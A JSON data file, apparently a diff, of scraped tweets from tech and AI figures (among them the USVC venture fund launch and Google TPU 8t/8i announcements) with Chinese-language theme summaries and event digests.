+ "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://nitter.net/HarryStebbings/status/2047426032840634830#m", + "published_at": "2026-04-23T21:23:00+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://nitter.net/HarryStebbings/status/2047413285675290984#m", + "published_at": "2026-04-23T20:32:21+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester", + "url": "https://nitter.net/breadstickz1/status/2047389262253855041#m", + "published_at": "2026-04-23T18:56:53+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global economic scholars!\n\nhttps://ai.google/economy/ai-economy-researchers/", + "url": "https://nitter.net/DigEconLab/status/2047378514240999569#m", + "published_at": "2026-04-23T18:14:10+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹", + "url": "https://nitter.net/cuckuke/status/2047325302771061148#m", + "published_at": "2026-04-23T14:42:44+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions\nby @IntEngineering\n\n#Robotics #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m", + "published_at": "2026-04-23T06:57:05+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour\nby @AadityaAnand_11\n\n#Robotics #Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m", + "published_at": "2026-04-23T06:23:14+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": "2026-04-23T05:52:02+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea!\n\nYour optimistic take on the value that humans will continue to deliver was so refreshing.", + "url": "https://nitter.net/TejuAdeyinka/status/2046761422148018260#m", + "published_at": "2026-04-22T01:22:04+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: How do AI agents influence knowledge work?\n\n@SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three projects on the Economics of Applied AI.\n\nWatch here: https://youtu.be/4_T4aTLWtwY", + "url": "https://nitter.net/DigEconLab/status/2046698761221783753#m", + "published_at": "2026-04-21T21:13:05+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323\nclass at @Stanford today. Questions?", + "url": "https://nitter.net/saranormous/status/2046637828025835983#m", + "published_at": "2026-04-21T17:10:57+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others. @BharatKChandar @RuyuChen", + "url": "https://nitter.net/erikbryn/status/2046244291945927102#m", + "published_at": "2026-04-20T15:07:11+00:00" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 100 + }, + { + "title": "模型能力", + "count": 27 + }, + { + "title": "投融资与并购", + "count": 8 + }, + { + "title": "交易与市场", + "count": 7 + }, + { + "title": "算力与芯片", + "count": 3 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "AI技术多元化部署", + "subtitle": "云服务与系统设计新方向", + "bullets": [ + "科技公司与全球多云服务商达成协议", + "操作系统/互联网协议需适应AI代理协同", + "AI安全性和经济影响成为核心讨论议题" + ] + }, + { + "id": "t2", + "title": "初创企业生存挑战", + "subtitle": "市场策略与投资关系", + "bullets": [ + "创始人需平衡技术创新与商业落地", + "风险资本对初创企业的筛选标准变化", + "竞争对手的威胁度评估与创新动力" + ] + }, + { + "id": "t3", + "title": "媒体生态与意见对抗", + "subtitle": "信息战中的技术审计", + "bullets": [ + "主流媒体遭遇AI内容管理难题", + "政治观点呈现极端化表现特征", + "独立媒体通过存档机制进行博弈" + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "OpenAI与微软合作模式升级", + "meta": "2026-04-27T13:24:26+00:00", + "summary": "多云部署协议延长至2032年,含模型与产品收益分成", + "url": "https://nitter.net/sama/status/2048755148361707946#m" + }, + { + "id": "p02", + "title": "Transformer架构里程碑", + "meta": "2026-04-27T13:29:14+00:00", + "summary": "企业级AI系统部署需要组合开放与专有模型", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m" + }, + { + "id": "p03", + "title": "特朗普解雇科学委员会", + "meta": "2026-04-26T17:27:23+00:00", + "summary": "美国国家科学委员会全体成员被单方面解职", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m" + }, + { + "id": "p04", + "title": "AI代理安全风险警示", + "meta": "2026-04-27T12:48:41+00:00", + "summary": "将自动补全误标为AI的风险尺度评估升级", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m" + }, + { + "id": "p05", + "title": "Starlink部署升级", + "meta": "2026-04-26T17:27:34+00:00", + "summary": "TPU v8t/v8i芯片推动规模化卫星发射", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "AI代理灾难故事的根源也在用户身上,不是他们被欺骗了数据,而是他们根本没意识到AI目前处于玩具阶段", + "speaker": "Gary Marcus", + "date": "2026-04-27T02:25:10+00:00", + "note": "对AI可靠性标准的重新定义", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m" + }, + { + "id": "q2", + "quote": "生产力革命最大的受益者永远是使用者,最深的教训是每个失败都归于用户错误,每次突破都归功于模型", + "speaker": "Paul Graham", + "date": "2026-04-26T14:36:59+00:00", + "note": "AI开发中的利益分配哲学", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m" + }, + { + "id": "q3", + "quote": "推动操作系统和网络协议的根本性重构,这样人类用户与AI代理才能成为平等参与者", + "speaker": "Sam Altman", + "date": "2026-04-26T15:46:41+00:00", + "note": "人机交互基础设施革新", + "url": "https://nitter.net/sama/status/2048428561481265539#m" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "模型合作伙伴", + "subtitle": "OpenAI生态扩展", + "level": "P0", + "items": [ + { + "text": "多云部署协议详情披露", + "url": 